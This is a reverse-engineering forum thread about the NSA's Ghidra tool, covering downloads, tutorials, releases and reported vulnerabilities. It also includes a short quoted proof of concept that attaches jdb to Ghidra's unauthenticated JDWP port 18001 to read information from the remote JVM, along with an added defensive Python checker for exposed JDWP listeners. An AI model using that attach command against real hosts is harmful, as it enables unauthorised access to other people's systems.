RE FORUM

[REVERSE ENGINEERING] => Tools => Topic started by: DARKER on March 06, 2019, 08:07:57 AM

Title: Ghidra
Post by: DARKER on March 06, 2019, 08:07:57 AM
Download:
https://ghidra-sre.org/

First Look at Ghidra
https://www.youtube.com/watch?v=285b_DEmvHY

Quick Analysis of a Trickbot Sample with NSA's Ghidra SRE Framework
http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 03:27:52 AM
I've already had a look at it and I have to say it looks pretty good. And if a community forms around it, it will be a big deal.

I was just wondering why they actually released it. Two possibilities occurred to me:
1. They are looking for new people for specific RCE-related positions
2. They have something better (if they really have been developing it since 2000, it is an almost 20-year-old application) and decided to give this one to the public so they could be the good guys for once
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 03:36:14 AM
Quote
NSA RE Tool 'GHIDRA' Backed Port - Java Debug Wire Protocol (JDWP) Port Opened(TCP/18001)

Exploit PoC:
jdb -attach x.x.x.x:18001 <= No auth

$ jdb -attach x.x.x.x:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
>

Information leaks can be leveraged to determine details about the remote OS
platform and Java installation configuration through the "classpath" command.

> classpath
base directory: C:\Windows\system32
classpath: [ ** MASKED ** list of jar's loaded in remote JVM ]
bootclasspath: [ ** MASKED ** list of JRE paths ]
>
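
A defensive check for the exposure quoted above, as an added example that is not part of the original posts or of Ghidra: it parses a JVM command line for a JDWP agent option and reports whether the debug listener would be reachable from other hosts. The sample command lines are constructed (only port 18001 comes from the quote), and the default `java_major=11` is an assumption about the JVM in use.

```python
import re

# Both spellings of the JDWP agent option: -agentlib:jdwp=... and legacy -Xrunjdwp:...
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")
LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}

def audit_jdwp(cmdline, java_major=11):
    """Return one finding per listening JDWP agent option in a JVM command line."""
    findings = []
    for m in JDWP_OPT.finditer(cmdline):
        opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
        if opts.get("server", "n") != "y":
            continue  # JVM dials out to a debugger instead of listening
        host, _, port = opts.get("address", "").rpartition(":")
        if not host:
            # Bare port: all interfaces before JDK 9, loopback only from JDK 9 on.
            host = "*" if java_major < 9 else "localhost"
        # JDWP has no authentication, so any non-loopback bind is an exposure.
        findings.append({"host": host, "port": port, "exposed": host not in LOOPBACK})
    return findings

# Constructed sample command lines (not taken from Ghidra's launch scripts).
SAMPLES = [
    "java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=*:18001 -jar app.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:18001 -jar app.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=18001 -jar app.jar",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(audit_jdwp(s), "<-", s)
```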
Title: Re: Ghidra
Post by: DARKER on March 07, 2019, 07:40:50 AM
I think they don't have anyone to take care of it, test it for them, develop it, come up with ideas ...
This way people will take care of it for them, make useful plugins ...
The more it gets used, the more polished it will be ...
I'm curious how Ilfak will react to it ... (IDA)
Title: Re: Ghidra
Post by: RubberDuck on March 07, 2019, 01:20:12 PM
(https://i.ibb.co/Y0ZNrKr/stuxnet-ghidra.png)
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 01:48:49 AM
Ghidra tutorial
https://www.youtube.com/watch?v=tH9A2zVIzKI
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 10:11:57 AM
So far it looks like there will be more problems than I would have expected  :-X

An XXE vulnerability has just been found
https://twitter.com/sghctoma/status/1103392091009413120
Title: Re: Ghidra
Post by: RubberDuck on March 08, 2019, 11:53:25 PM
The first scripts for Ghidra.
https://github.com/ghidraninja/ghidra_scripts
Title: Re: Ghidra
Post by: Z!L0G80 on March 09, 2019, 11:55:06 PM
It also seems to me that they want a community to improve it for them, and it is taking off quite well, see the issues on GitHub or, for example, the Toshiba MeP processor module for GHIDRA >> https://github.com/xyzz/ghidra-mep
Title: Re: Ghidra
Post by: DARKER on March 28, 2019, 07:55:27 AM
Ghidra v9.0.1 (March 2019)

Change Log + Download:
https://ghidra-sre.org/releaseNotes.html
Title: Re: Ghidra
Post by: RubberDuck on April 03, 2019, 08:25:24 PM
https://www.reddit.com/r/ghidra
Title: NSA Releases GHIDRA Source Code
Post by: RubberDuck on April 04, 2019, 04:42:48 PM
NSA today finally released the complete source code for GHIDRA version 9.0.2 which is now available on its Github repository.

https://github.com/NationalSecurityAgency/ghidra
Title: Re: Ghidra
Post by: Kockatá hlava on June 11, 2019, 07:57:06 AM
Ghidra 9.0.4 was released on May 16 (version 9.0.3 was skipped). According to the changelog, they are managing to respond to bugs reported by the community and fix them.
Title: Re: Ghidra
Post by: Z!L0G80 on June 15, 2019, 02:52:54 PM
Nice, but I still somehow can't get it to compile :/
Title: Re: Ghidra
Post by: Kockatá hlava on June 16, 2019, 10:40:54 AM
Isn't downloading the release build enough for you?
Title: Re: Ghidra
Post by: Kockatá hlava on October 07, 2019, 04:59:02 PM
Ghidra v9.1 BETA is available. It looks like there is a pile of improvements and bugfixes:

https://ghidra-sre.org/releaseNotes_9.1.html
Title: Re: Ghidra
Post by: RubberDuck on October 10, 2019, 10:10:18 AM
Flaw in National Security Agency’s Ghidra reverse-engineering tools allows hackers to execute code in vulnerable systems.

https://threatpost.com/bug-in-nsas-ghidra/148787/
Title: Re: Ghidra
Post by: Kockatá hlava on May 31, 2021, 10:56:39 AM
Ghidra 10.0 will have a debugger: https://ghidra-sre.org/releaseNotes_10.0beta.html
Title: Re: Ghidra
Post by: RubberDuck on January 18, 2022, 10:59:14 AM
Ghidra is still struggling with the Log4Shell bug
https://github.com/NationalSecurityAgency/ghidra/issues/3736